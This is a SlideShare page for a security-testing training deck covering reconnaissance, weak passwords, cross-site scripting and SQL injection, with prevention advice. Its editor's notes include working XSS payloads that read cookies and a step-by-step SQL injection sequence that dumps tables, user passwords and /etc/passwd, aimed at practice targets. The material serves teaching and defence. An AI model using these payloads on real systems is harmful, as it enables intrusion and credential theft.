SlideShare a Scribd company logo
Security Testing
Operation Vijay
What is hacking?
Hackers
Types of Hackers
● Ethical Hackers
● Crackers
Define
Security Testing is a type of testing that
intends to uncover vulnerabilities of
the system and determine that its data
and resources are protected from
possible intruders.
Types of Security Testing
● Infrastructure Security Testing
● Application Security Testing
When?
Security Testing Vocabulary
● Reconnaissance/ Information
gathering
● Vulnerability
● Exploit
Reconnaissance
Demo
Reconnaissance
Mission
P@ssw04d
Security testing   operation vijay
Default / Weak Passwords
Password Vaults
Demo
Cross Site Scripting
Client side injection attack
Types:
Reflected XSS
Stored XSS
DOM based XSS
Reflected XSS
Demo
Security testing   operation vijay
Reflected XSS
Mission
Stored XSS
Demo
Security testing   operation vijay
Stored XSS
Mission
XSS Prevention
Don’t use user input as-is
Encoding
X-XSS-Protection Response Header
HttpOnly flag Response Header
Popular XSS Attacks
SQL Injection
Attack where SQL commands are
injected in order to affect the execution
of predefined SQL commands
SQL Injection
Demo
Security testing   operation vijay
SQL Injection Prevention
Don’t use user input directly
Use prepared statements
Use stored procedures
Use frameworks
ZAP
References
https://www.owasp.org
https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
https://www.google.co.in/about/appsecurity/tools/
https://xkcd.com/327/
http://www.dvwa.co.uk/
https://www.amazon.in/Web-Application-Hackers-Handbook-Exploiting-
ebook/dp/B005LVQA9S
https://google-gruyere.appspot.com
Thank you
Dhaval Doshi (@dhavaldoshi)
Lavanya Mohan (@LavanyaMohan210)
Shirish Padalkar (@_Garbage_)

More Related Content

PDF
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - Trivadis
PPTX
Static analysis for security
PPTX
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
PDF
A5-Security misconfiguration-OWASP 2013
PPTX
ASP.NET security vulnerabilities
PPTX
Phu appsec13
PPTX
Devouring Security XML Attack surface and Defences
PPTX
Java Secure Coding Practices
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - Trivadis
Static analysis for security
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
A5-Security misconfiguration-OWASP 2013
ASP.NET security vulnerabilities
Phu appsec13
Devouring Security XML Attack surface and Defences
Java Secure Coding Practices

What's hot (19)

PPTX
RSA Conference 2010 San Francisco
PDF
[Wroclaw #6] Introduction to desktop browser add-ons
PDF
[OWASP Poland Day] OWASP for testing mobile applications
PPTX
Microsoft Fakes, Unit Testing the (almost) Untestable Code
PPTX
Xss what the heck-!
ODP
Introduction to OWASP & Web Application Security
PPTX
Owasp top10salesforce
PDF
Secure PHP Coding
PPTX
[Wroclaw #2] Web Application Security Headers
PPTX
Web application security
PDF
Let's talk Security
PPTX
Secure Coding 101 - OWASP University of Ottawa Workshop
ODP
Csrf not-all-defenses-are-created-equal
PPTX
Application Security Tools
PDF
Java ist doch schon sicher?!
PPTX
[OWASP Poland Day] Application security - daily questions & answers
PDF
Secure code
ODP
OWASP Secure Coding
PDF
API Upload Test
RSA Conference 2010 San Francisco
[Wroclaw #6] Introduction to desktop browser add-ons
[OWASP Poland Day] OWASP for testing mobile applications
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Xss what the heck-!
Introduction to OWASP & Web Application Security
Owasp top10salesforce
Secure PHP Coding
[Wroclaw #2] Web Application Security Headers
Web application security
Let's talk Security
Secure Coding 101 - OWASP University of Ottawa Workshop
Csrf not-all-defenses-are-created-equal
Application Security Tools
Java ist doch schon sicher?!
[OWASP Poland Day] Application security - daily questions & answers
Secure code
OWASP Secure Coding
API Upload Test
Ad

Viewers also liked (20)

PDF
Gatling Performance Workshop
PDF
Mobile automation using appium.pptx
PDF
Increase automation to rest
PPTX
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
PPTX
Security_Testing_Presentation
PDF
Matteo meucci Software Security - Napoli 10112016
PPTX
Information gathering using windows command line utility
PPTX
Security testing
PDF
Secure by Design - Security Design Principles for the Rest of Us
PDF
TMPA-2017: Regression Testing with Semiautomatic Test Selection for Auditing ...
PPTX
PL-SQL DIFFERENT PROGRAMS
PPT
Software Security Engineering
PDF
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
PDF
CNIT 129S: 10: Attacking Back-End Components
PDF
DevSecCon Asia 2017 Ante Gulam: Integrating crowdsourced security into agile ...
PPTX
Sql injection
PDF
Automating Web Analytics
PPT
Sql injection
PPTX
Software Security Metrics
PPT
Security of software defined networking (sdn) and cognitive radio network (crn)
Gatling Performance Workshop
Mobile automation using appium.pptx
Increase automation to rest
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
Security_Testing_Presentation
Matteo meucci Software Security - Napoli 10112016
Information gathering using windows command line utility
Security testing
Secure by Design - Security Design Principles for the Rest of Us
TMPA-2017: Regression Testing with Semiautomatic Test Selection for Auditing ...
PL-SQL DIFFERENT PROGRAMS
Software Security Engineering
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 10: Attacking Back-End Components
DevSecCon Asia 2017 Ante Gulam: Integrating crowdsourced security into agile ...
Sql injection
Automating Web Analytics
Sql injection
Software Security Metrics
Security of software defined networking (sdn) and cognitive radio network (crn)
Ad

Similar to Security testing operation vijay (20)

PPTX
Security testing zap it
PPTX
Security Testing - Zap It
PPTX
Top web apps security vulnerabilities
PPTX
Web-Security-Protecting-Your-Digital-Assets.pptx
PPTX
XSS- an application security vulnerability
PDF
Web security for developers
PPTX
Security in Web Development Security Best Practices Keep software updated
PPTX
Ppt by shiya patel on Security in Web Development.pptx
PDF
Problems with parameters b sides-msp
PPTX
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
PPT
Application Security Part 1 Threat Defense In Client Server Applications ...
PDF
Best Practices for Full Stack Web Security.pdf
PDF
Security testing presentation
PPTX
Vulnerabilities in modern web applications
PDF
Web Security
PPTX
Security Best Practices
PPT
Security Vulnerabilities
PDF
웹 개발을 위해 꼭 알아야하는 보안 공격
PPTX
Cross Site Scripting (XSS)
PPTX
7 Steps to Threat Modeling
Security testing zap it
Security Testing - Zap It
Top web apps security vulnerabilities
Web-Security-Protecting-Your-Digital-Assets.pptx
XSS- an application security vulnerability
Web security for developers
Security in Web Development Security Best Practices Keep software updated
Ppt by shiya patel on Security in Web Development.pptx
Problems with parameters b sides-msp
tas-s6-software-engineering-slide-deck-secure-software-architecture.pptx
Application Security Part 1 Threat Defense In Client Server Applications ...
Best Practices for Full Stack Web Security.pdf
Security testing presentation
Vulnerabilities in modern web applications
Web Security
Security Best Practices
Security Vulnerabilities
웹 개발을 위해 꼭 알아야하는 보안 공격
Cross Site Scripting (XSS)
7 Steps to Threat Modeling

Recently uploaded (20)

PDF
Modernizing your data center with Dell and AMD
PDF
NewMind AI Monthly Chronicles - July 2025
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
PDF
Approach and Philosophy of On baking technology
PPTX
Cloud computing and distributed systems.
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
DOCX
The AUB Centre for AI in Media Proposal.docx
PDF
NewMind AI Weekly Chronicles - August'25 Week I
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PDF
Review of recent advances in non-invasive hemoglobin estimation
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Unlocking AI with Model Context Protocol (MCP)
Modernizing your data center with Dell and AMD
NewMind AI Monthly Chronicles - July 2025
Mobile App Security Testing_ A Comprehensive Guide.pdf
Approach and Philosophy of On baking technology
Cloud computing and distributed systems.
Encapsulation_ Review paper, used for researhc scholars
Building Integrated photovoltaic BIPV_UPV.pdf
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
20250228 LYD VKU AI Blended-Learning.pptx
CIFDAQ's Market Insight: SEC Turns Pro Crypto
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
Chapter 3 Spatial Domain Image Processing.pdf
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
The AUB Centre for AI in Media Proposal.docx
NewMind AI Weekly Chronicles - August'25 Week I
Reach Out and Touch Someone: Haptics and Empathic Computing
Review of recent advances in non-invasive hemoglobin estimation
Digital-Transformation-Roadmap-for-Companies.pptx
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Unlocking AI with Model Context Protocol (MCP)

Security testing operation vijay

Editor's Notes

  • #3: Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose
  • #4: Why do real hackers hack? What is their motivation? Money? Damage to opponent Fame Government does hacking to get information
  • #5: Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company. Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on. Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
  • #7: Infrastructure Security Testing Hack windows machine to get full control Causing network to go down Application Security Testing JIRA installed on a local server
  • #8: When do you do security testing??? When should we do security testing?
  • #9: Reconnaissance - mission to obtain information by visual observation or other detection methods a vulnerability is a weakness which allows an attacker to reduce a system's information assurance Exploit - causing unintended or unanticipated behaviour to occur on computer software, hardware, or something electronic (usually computerised) by taking advantage of vulnerabilities
  • #10: http://www.hackingtheuniverse.com/ i don’t like these guys i want to do some damage how do i start hacking lets think any ideas??? Show them wappalyzer. It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited. Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/ Show Wappalyzer Robots.txt Admin login screen Task ->
  • #11: http://www.hackingtheuniverse.com/ i don’t like these guys i want to do some damage how do i start hacking lets think any ideas??? Show them wappalyzer. It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited. Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/ Show Wappalyzer Robots.txt Admin login screen Task ->
  • #12: Ask for details of password It is recommended to use more than 8 characters in password. How many have less than 8 characters password for email? How many have only small case? Blah…. What would be your guess for their password What we were doing here is applying social engineering techniques to get to know your passwords or other important information. Can we really get details by just talking and not using a computer? Let’s see a video.
  • #13: https://www.youtube.com/watch?v=lc7scxvKQOo
  • #14: Default username and password like admin password for admin consoles. People use very common passwords (like password or just numbers, their names or dictionary words) 41% people use only lowercase password. Only about 4% use special characters in passwords 50% of people have password less than 8 characters in length (at least 8 is recommended)
  • #16: XSS attacks are type of injection attacks in which the attacker injects malicious code in web pages that are viewed by other users of the application.
  • #17: Basic using script tag Ask if you can just sanitize script tag.. Show how to bypass that -> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
  • #19: https://google-gruyere.appspot.com/536172483468/%3Cscript%3Ealert(document.cookie)%3C/script%3E https://google-gruyere.appspot.com/536172483468/feed.gtl?uid=%3Cscript%3Ealert(1)%3C/script%3E
  • #20: Ask if small text fields will prevent this attack Tell them about intercepting requests
  • #22: <a onmouseover="alert(1)" href="#">read this!</a> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> Google Gruyere: Stored XSS: (New snippet) <a onmouseover="alert(1)" href="#">read this!</a> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
  • #23: HTML encoding (< → &lt;) URL encoding before inserting it into HTML HTML attribute encoding CSS encoding This HTTP response header enables the Cross-site scripting (XSS) filter built into some modern web browsers. This header is usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through client side script
  • #25: It happens when computers cannot tell difference between code and data
  • #26: 2 ' 2' # 2' OR 1=1 2' Union select null # 2' union Select null, null # 2' Union Select null, @@version # 2' Union Select null, database() # 2' union select null, table_name from information_schema.tables # 2' union select null, table_name from information_schema.tables where table_name like '%user%' # 2' Union select null, column_name from information_schema.columns where table_name='users' # 1' Union select null, concat(user, 0x0a,password) from users # 2' Union select null, LOAD_FILE('/etc/passwd') #
  • #30: https://www.google.co.in/about/appsecurity/tools/